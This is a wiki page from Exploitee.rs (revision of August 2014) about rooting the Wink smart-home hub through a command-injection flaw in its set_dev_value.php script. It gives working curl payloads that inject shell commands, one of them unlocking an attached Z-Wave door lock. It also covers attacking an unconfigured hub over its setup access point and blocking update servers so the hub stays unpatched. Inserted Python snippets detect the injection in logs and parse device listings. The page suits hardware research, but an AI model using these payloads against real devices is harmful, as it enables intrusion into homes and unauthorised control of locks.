Difference between revisions of "Wink Hub"

From Exploitee.rs
Revision as of 06:23, 19 August 2014

"Although the information we release has been verified and shown to work to the best of our knowledge, we can't be held accountable for bricked devices or roots gone wrong."

[Image: WinkHub.jpg]

This page will be dedicated to a general overview, descriptions, and information related to the Wink Hub.

Purchase

Buying devices is expensive and, in a lot of cases, our testing leads to bricked equipment. If you would like to help support our group, site, and research, please use one of the links below to purchase your next device. Purchase the Wink Hub at Amazon

Disassembly

UART

The pin-out for UART can be found on the image below.

set_dev_value.php Command Execution

  • THIS IS FIXED BY OTA AS OF 8/19/2014

The Wink Hub runs a web server, and within the server is a script that allows for remote command execution. The PHP code for this script is shown in the image below.

[Image: source code of /set_dev_value.php vulnerability]

As you can see, the "nodeId" and "attrId" values are concatenated into the sudo command string that is then run through the PHP "passthru()" call. This allows us to execute commands by simply posting a command as either "nodeId" or "attrId" using any shell command format (";;", "$()", "|", "``").

Example:

curl "http://IP-OF-CAMERA/set_dev_value.php" -d "nodeId=a&attrId=;COMMAND-HERE;"
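The following is an added example, not code from the original page: Python logic, written from a defender's view, that applies the check set_dev_value.php lacked (nodeId and attrId must be plain numeric IDs) and runs it over constructed web-log lines to flag the injection pattern described above. The log line format and the numeric-ID rule are assumptions.

```python
import re
from urllib.parse import unquote_plus
# Shell formats this page says work inside nodeId/attrId (";", "$()", "|", "``")
# plus other common separators: any of them breaks out of the sudo command
# string that set_dev_value.php builds and hands to passthru().
SHELL_META = re.compile(r'[;|&`$()<>\n]')
# Assumption: a legitimate node or attribute ID for aprontest is a small decimal
# number (compare the MASTERID and ATTRIBUTE columns in the aprontest output below).
ID_PATTERN = re.compile(r'^[0-9]{1,6}$')

def parse_body(body):
    """Split a form body on '&' only (older urllib.parse.parse_qs also split
    on ';' and would hide the very separator the injection relies on)."""
    params = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        params.setdefault(name, []).append(unquote_plus(value))
    return params

def classify_request(body):
    """Report which of nodeId/attrId fail strict validation and whether any
    value carries shell metacharacters (an injection attempt)."""
    invalid, injection = [], False
    for name in ("nodeId", "attrId"):
        for value in parse_body(body).get(name, []):
            if not ID_PATTERN.match(value):
                invalid.append(name)
            if SHELL_META.search(value):
                injection = True
    return {"invalid": invalid, "injection": injection}

# Constructed sample log lines (not captured from a real hub): the first two
# bodies mirror this page's examples, the third uses the "$()" form the page
# mentions, and the last two are benign.
SAMPLE_LOG = [
    "POST /set_dev_value.php nodeId=a&attrId=;/usr/sbin/aprontest -l;",
    "POST /set_dev_value.php attrId=a&nodeId=;/usr/sbin/aprontest -m1 -t 10 -u -v FALSE;",
    "POST /set_dev_value.php nodeId=1&attrId=$(id)",
    "POST /set_dev_value.php nodeId=1&attrId=10",
    "POST /index.php page=status",
]

def scan_log(lines):
    """Return (line, verdict) for each set_dev_value.php POST in the log."""
    hits = []
    for line in lines:
        parts = line.split(" ", 2)
        if len(parts) == 3 and parts[:2] == ["POST", "/set_dev_value.php"]:
            hits.append((line, classify_request(parts[2])))
    return hits
```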

Hacking a Newly Purchased Wink Hub

This must be done on a Wink Hub before it takes its first round of updates (which patches the "set_dev_value" bug detailed above).

To hack a newly purchased Wink Hub, you'll first want to attack the device before connecting it to the internet. This can be done by leveraging the access point (AP) the device puts up for its initial configuration.

  1. Power on a newly purchased (and unconfigured) Wink Hub.
  2. On your PC, look for a network with an SSID with the prefix "WINKHUB-".
  3. Connect to the "WINKHUB-" network.
  4. Set up a static IP on your computer with any "192.168.0.*" address (other than "192.168.0.1").
  5. Your Wink Hub will have the 192.168.0.1 address, and you can now follow the steps in the "set_dev_value.php Command Execution" section.
  • If you plan to use your Wink Hub without patching (for hardware hacking or any other personal use), you will want to disable communication with the Wink Hub servers by adding the following to the /etc/hosts file on the hub.
127.0.0.1       hub-api.winkapp.com
127.0.0.1       hub-updates.winkapp.com
127.0.0.1       wink-hub-images.s3.amazonaws.com

Accessing Peripherals

Accessing peripherals attached to the device can be accomplished using the "/usr/sbin/aprontest" binary.

This binary is capable of listing all the attached peripherals as well as the peripheral states and state types.

For example:

curl "http://IP-OF-CAMERA/set_dev_value.php" -d "attrId=a&nodeId=;/usr/sbin/aprontest -l;"
Found 1 devices in database...
MASTERID |     INTERCONNECT |                         USERNAME
       1 |            ZWAVE |      New SECURE_KEYPAD_DOOR_LOCK

curl "http://IP-OF-CAMERA/set_dev_value.php" -d "attrId=a&nodeId=;/usr/sbin/aprontest -m1 -l;"
Generic/Specific device types: 0x40/0x03
Manufacturer ID: 0x003b Product Type: 0x6341 Product Number: 0x5044
Device has 1 attributes...
New SECURE_KEYPAD_DOOR_LOCK
ATTRIBUTE |               DESCRIPTION |   TYPE | MODE |          GET |          SET
       10 |               Lock_Unlock |   BOOL |  R/W |         TRUE |         TRUE

Above you can see us querying the Wink Hub through the bug in the "set_dev_value" PHP script to list the attached devices. We then use the "MASTERID" in the second query to find out exactly how to communicate with the attached peripheral.

Using the same "aprontest" binary, we can then manipulate the state of the attached device.

For example:

curl "http://IP-OF-CAMERA/set_dev_value.php" -d "attrId=a&nodeId=;/usr/sbin/aprontest -m1 -t 10 -u -v FALSE;"
Update device with master ID 1, setting value FALSE
Update callback: Status 0 on updating master ID: 1

curl "http://IP-OF-CAMERA/set_dev_value.php" -d "attrId=a&nodeId=;/usr/sbin/aprontest -m1 -l;"
Generic/Specific device types: 0x40/0x03
Manufacturer ID: 0x003b Product Type: 0x6341 Product Number: 0x5044
Device has 1 attributes...
New SECURE_KEYPAD_DOOR_LOCK
ATTRIBUTE |               DESCRIPTION |   TYPE | MODE |          GET |          SET
       10 |               Lock_Unlock |   BOOL |  R/W |        FALSE |        FALSE

The above example first sets the Lock_Unlock state to "FALSE", which unlocks the door lock. Then we query the device status again and confirm it is now "FALSE".
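As an added example (not part of the original page or of the aprontest tool itself), a Python parser for the aprontest listings shown above, so the hub's attached devices and writable attributes can be inventoried from a captured listing; the sample text is constructed from the output on this page.

```python
# Constructed sample: the two aprontest listings shown on this page, joined as
# the set_dev_value.php bug would return them (not captured from a real hub).
SAMPLE_OUTPUT = """Found 1 devices in database...
MASTERID |     INTERCONNECT |                         USERNAME
       1 |            ZWAVE |      New SECURE_KEYPAD_DOOR_LOCK
Generic/Specific device types: 0x40/0x03
Manufacturer ID: 0x003b Product Type: 0x6341 Product Number: 0x5044
Device has 1 attributes...
New SECURE_KEYPAD_DOOR_LOCK
ATTRIBUTE |               DESCRIPTION |   TYPE | MODE |          GET |          SET
       10 |               Lock_Unlock |   BOOL |  R/W |         TRUE |         TRUE
"""

def parse_aprontest(text):
    """Parse 'aprontest -l' and 'aprontest -m<id> -l' output into dicts.
    A header row (MASTERID / ATTRIBUTE) selects which table the following
    '|'-separated rows belong to; any other line ends the table."""
    devices, attrs, table = [], [], None
    for line in text.splitlines():
        if line.startswith("MASTERID"):
            table = "dev"
        elif line.startswith("ATTRIBUTE"):
            table = "attr"
        elif "|" not in line:
            table = None
        else:
            c = [cell.strip() for cell in line.split("|")]
            if table == "dev" and len(c) == 3:
                devices.append({"master_id": int(c[0]), "interconnect": c[1],
                                "name": c[2]})
            elif table == "attr" and len(c) == 6:
                attrs.append({"attr_id": int(c[0]), "description": c[1],
                              "type": c[2], "mode": c[3], "get": c[4], "set": c[5]})
    return {"devices": devices, "attributes": attrs}

def writable_lock_attributes(parsed):
    """Audit helper: attributes that let a caller change a lock state, which
    is exactly what the -u/-t/-v example on this page does."""
    return [a for a in parsed["attributes"]
            if "W" in a["mode"] and "lock" in a["description"].lower()]
```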

Demo

aprontest Syntax

Usage: aprontest [OPTION]...
Send commands and list information about connected devices

Operations:
  -a		Add a new home automation device
  -n		Manually add a home automation device to the database only.  USE WITH CAUTION.
		Only supports zigbee at this time.
  -d		Delete a home automation device
  -f		Force delete a home automation device from the database only.  USE WITH CAUTION.
		Only supports zigbee at this time.
  -u		Update the state of a home automation device with a new value
  -e		Force a refresh of a home automation device
  -g		Set a generic callback for a radio for one minute of radio
		testing
  -l		List general information about automation devices, or specific
		information about one device
  --set-name	Set user-readable name for a device

Other Options:
  -r <radio>	Specify a radio for an Add Device or Generic Callback operation.
		One of lutron, zwave, zigbee, kidde
  -m <id>	Specify a master device ID for a Delete, Update, Refresh, or
		List operation
  -t <id>	Specify an attribute ID for an Update operation
  -v <value>	Specify a new value to set for an Update operation

Kidde Specific Operations:
  -k <ID>	Set Kidde system ID

Z-Wave Specific Operations:
  --zwave_controller_reset	Reset the zwave controller. USE WITH CAUTION.
				Existing z-wave network will be lost.
  --zwave_remove_failed		Remove a failed zwave device. 
  --zwave_replace_failed	Replace a failed zwave device.
  --zwave_learn_mode		Enter Learn Mode on the Zwave Controller.
  --zwave_controller_shift	Hand off control to another (new) Zwave controller.
  --zwave_exclusion_mode	Enter Exclusion Mode on the Zwave Controller.

Lutron Specific Operations:
  --lutron_pico_add <dimmerMasterId>	Add dimmerMasterId to the control list for the pico controller with masterId set via -m
  --lutron_pico_del <dimmerMasterId>	Delete dimmerMasterId from the control list for the pico controller with masterId set via -m

Fixing "set_dev_value.php" Bug

This script isn't actually used for anything and can be removed or moved. This can be done by using the original bug to move the script that contains it out of the way.

curl "http://IP-OF-CAMERA/set_dev_value.php" -d "nodeId=a&attrId=;mv /var/www/set_dev_value.php /var/www/set_dev_value.php.txt;"